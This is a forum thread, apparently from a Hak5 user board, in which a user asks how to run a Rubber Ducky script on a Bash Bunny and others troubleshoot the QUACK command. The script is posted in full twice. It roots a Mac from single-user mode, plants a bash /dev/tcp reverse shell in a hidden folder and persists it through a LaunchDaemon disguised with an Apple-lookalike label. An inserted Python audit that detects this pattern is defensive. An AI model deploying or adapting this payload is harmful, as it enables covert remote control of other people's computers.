valentino00776 Posted March 13, 2017
Can someone please explain how you use Ducky code txt on the Bash Bunny? Step by step would be appreciated. Thanks
valentino00776 (Author) Posted March 13, 2017
Example: how would I get this to work on the Bash Bunny?

REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER
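An added defender-side example, not code from this thread or from the script's author: a small Python audit that flags the launchd persistence pattern the script above installs (a LaunchDaemon in an Apple-lookalike namespace, pointing an interpreter at a script under a hidden directory, respawned at load and on a short interval, with a bash /dev/tcp socket inside). The plist and script samples are constructed, and read_script is a hypothetical hook so the audit runs offline.

```python
import plistlib
import re
from pathlib import Path

# Constructed sample: the LaunchDaemon the thread's script writes to
# /Library/LaunchDaemons/com.apples.services.plist, and the script it points at.
SAMPLE_PLIST = b"""<plist version="1.0"><dict>
<key>Label</key><string>com.apples.services</string>
<key>ProgramArguments</key><array>
<string>/bin/sh</string><string>/Library/.hidden/connect.sh</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>60</integer>
</dict></plist>"""
SAMPLE_SCRIPT = "#!/bin/bash\nbash -i >& /dev/tcp/mysite.com/1337 0>&1\nwait"

# Constructed benign job for comparison: a real Apple-namespace daemon shape.
BENIGN_PLIST = b"""<plist version="1.0"><dict>
<key>Label</key><string>com.apple.example.agent</string>
<key>ProgramArguments</key><array><string>/usr/libexec/exampled</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}

def audit_launch_daemon(plist_bytes, read_script=None):
    """Return a list of findings for one LaunchDaemon plist.
    read_script(path) -> str is a hypothetical hook returning the contents of a
    referenced script, so the check can run against embedded samples."""
    job = plistlib.loads(plist_bytes)
    label = job.get("Label", "")
    args = job.get("ProgramArguments", [])
    findings = []
    # Hidden directory components (e.g. /Library/.hidden) are rare in legitimate jobs.
    for arg in args:
        if any(part.startswith(".") for part in Path(arg).parts if part != "/"):
            findings.append(f"hidden path component: {arg}")
    # Labels that look like Apple's namespace but are not ("com.apples.", "com.apple-x").
    if re.match(r"com\.apple(?!\.)", label):
        findings.append(f"label impersonates Apple namespace: {label}")
    # An interpreter wrapping an external script, started at load and every 60 s.
    if args and Path(args[0]).name in INTERPRETERS and len(args) > 1:
        findings.append(f"interpreter wrapper: {' '.join(args)}")
    if job.get("RunAtLoad") and job.get("StartInterval", 10**9) <= 300:
        findings.append(f"RunAtLoad with short StartInterval={job['StartInterval']}")
    # Inspect the referenced script for the bash /dev/tcp reverse-shell idiom.
    if read_script:
        for arg in args[1:]:
            if "/dev/tcp/" in (read_script(arg) or ""):
                findings.append(f"script {arg} opens a /dev/tcp socket")
    return findings
```

On a live host you would feed this every file under /Library/LaunchDaemons and /Library/LaunchAgents, with read_script reading the referenced path from disk.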
LowValueTarget Posted March 13, 2017
Check out the `QUACK` command: http://wiki.bashbunny.com/#!index.md
valentino00776 (Author) Posted March 13, 2017
Hey buddy, thanks for your reply. I've looked but still can't get it to work. Can you PLEASE give an example? Thank you
n00shE Posted March 13, 2017
Just put Q in front of every single line and rename it to payload.txt. Then place it in the switch folder you want to run it in.
SRG Posted March 13, 2017
Easiest way, both for maintenance as well as for actual use, is to put your script as is into a file, say ducky.txt. Then do:

QUACK ducky.txt

Otherwise, if you want it inline, just put QUACK in front of each line.
valentino00776 (Author) Posted March 13, 2017
Did this and it still doesn't work. Any ideas guys please, what am I missing????

#!/bin/bash
LED R
ATTACKMODE HID
LED R G
QUACK DELAY 1000
QUACK STRING mount -uw /
QUACK ENTER
QUACK DELAY 2000
QUACK STRING mkdir /Library/.hidden
QUACK ENTER
QUACK DELAY 200
QUACK STRING echo '#!/bin/bash
QUACK ENTER
QUACK STRING bash -i >& /dev/tcp/192.168.1.55/4444 0>&1
QUACK ENTER
QUACK STRING wait' > /Library/.hidden/connect.sh
QUACK ENTER
QUACK DELAY 500
QUACK STRING chmod +x /Library/.hidden/connect.sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING mkdir /Library/LaunchDaemons
QUACK ENTER
QUACK DELAY 200
QUACK STRING echo '<plist version="1.0">
QUACK ENTER
QUACK STRING <dict>
QUACK ENTER
QUACK STRING <key>Label</key>
QUACK ENTER
QUACK STRING <string>com.apples.services</string>
QUACK ENTER
QUACK STRING <key>ProgramArguments</key>
QUACK ENTER
QUACK STRING <array>
QUACK ENTER
QUACK STRING <string>/bin/sh</string>
QUACK ENTER
QUACK STRING <string>/Library/.hidden/connect.sh</string>
QUACK ENTER
QUACK STRING </array>
QUACK ENTER
QUACK STRING <key>RunAtLoad</key>
QUACK ENTER
QUACK STRING <true/>
QUACK ENTER
QUACK STRING <key>StartInterval</key>
QUACK ENTER
QUACK STRING <integer>60</integer>
QUACK ENTER
QUACK STRING <key>AbandonProcessGroup</key>
QUACK ENTER
QUACK STRING <true/>
QUACK ENTER
QUACK STRING </dict>
QUACK ENTER
QUACK STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 500
QUACK STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 200
QUACK STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 1000
QUACK STRING shutdown -h now
QUACK ENTER
LED R
GermanNoob Posted March 13, 2017
@valentino00776 What exactly doesn't work? Have you run the DuckyInstall payload?
valentino00776 (Author) Posted March 13, 2017
It works with the Rubber Ducky but I can't get it to run on the Bash Bunny. The light goes red and green but no keystrokes.
Cpt.Pickles Posted March 13, 2017
Have you attempted a "helloworld" script to even know if your BB is set up, to GermanNoob's point??? That is the first step...
GermanNoob Posted March 13, 2017
> 41 minutes ago, valentino00776 said: It works with the Rubber Ducky but I can't get it to run on the Bash Bunny. The light goes red and green but no keystrokes.

@valentino00776 This answers my question 1... What about answering question 2?
valentino00776 (Author) Posted March 13, 2017
I've tried the nscan payload and that works. I'm so sorry GermanNoob, what's the duckyinstall payload? Sorry for my lack of knowledge. Even got a WiFi Nano, never used it for 9 months lol
GermanNoob Posted March 13, 2017
> 11 minutes ago, valentino00776 said: I've tried the nscan payload and that works

I don't know that payload... Where did you get it from? Or did you mean nmapper? Most probably the payload you tested doesn't use the QUACK command...

> 12 minutes ago, valentino00776 said: I'm so sorry GermanNoob, what's the duckyinstall payload?

As you don't know it, I assume you haven't installed it, and therefore that is most probably the reason why QUACK doesn't work... Copy the duckyinstall payload from the library to one of the switches and run it. After it has succeeded, test your original script again...
valentino00776 (Author) Posted March 13, 2017
Yes, sorry, nmapper. I'll try your suggestion and let you know. Really appreciate your time and help buddy
valentino00776 (Author) Posted March 13, 2017
Just looking at the payload. Do I need to unzip it and run it somewhere (on a different PC)? What do I actually install, and how? I know it's getting embarrassing to ask
illwill Posted March 13, 2017 (edited)
Violation of CoC
Edited October 8, 2017 by illwill: Violation of CoC
valentino00776 (Author) Posted March 13, 2017
Hey illwill, thanks. But what do you mean???? Can you show me an example, or use what I've posted to show me?? Thank you
GermanNoob Posted March 13, 2017
> 19 minutes ago, valentino00776 said: Just looking at the payload. Do I need to unzip it and run it somewhere (on a different PC)? What do I actually install, and how? I know it's getting embarrassing to ask

You don't have to unzip anything... just move everything to the switch folder and go for it. What are you going to install? Just read the readme.txt!

> DuckToolkit installer for Bash Bunny.
> Adds support for new languages and uses the Ducktoolkit python library for encoding.
> Version 1.0.0
> Moves the library files to /tools
> Update Q and QUACK to point to the new library
> Writes error to /root/ducky.log
>
> Purple Blinking.................Moving tools
> Purple Solid....................Tools moved
> Amber Blinking..................Setup tools
> Red Solid.......................Tool installation failed
> White Solid.....................Installation completed successfully
valentino00776 (Author) Posted March 13, 2017
Ok so I copied duckyinstall onto switch 1, plugged it in, and it has an install log saying installed. I then copied my payload .txt to switch 2 and tried it with the QUACK commands on every line, but still nothing. My hair is going grey LOL
valentino00776 (Author) Posted March 13, 2017
Install log:

Install Log:
----------------
Found /root/udisk/payloads/switch1/DuckToolkit-1.0.1.tar.gz
Copying files to target dir
Move Complete
Update Q
Update QUACK
GermanNoob Posted March 13, 2017 (edited)
Just to be sure: is it named "payload .txt" or "payload.txt"? And please try a simple "hello world" payload... In your script I'm missing opening a terminal or similar... And post that script also...
Edited March 13, 2017 by GermanNoob
valentino00776 (Author) Posted March 13, 2017
This worked:

#!/bin/bash
ATTACKMODE HID
LED R G
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 500
QUACK STRING notepad
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 750
QUACK STRING Hello World!!!
QUACK ENTER
valentino00776 (Author) Posted March 13, 2017
The original script is run on a Mac in single user mode, where a terminal is already open; it just won't type any of the commands. Runs great with the Rubber Ducky.
GermanNoob Posted March 13, 2017
Congratulations! So now it's only something about your script...

> 4 hours ago, valentino00776 said:
> #!/bin/bash
> LED R
> ATTACKMODE HID
> LED R G
> QUACK DELAY 1000
> QUACK STRING mount -uw /
> QUACK ENTER

You simply begin to quack commands without having opened a terminal or anything to write in...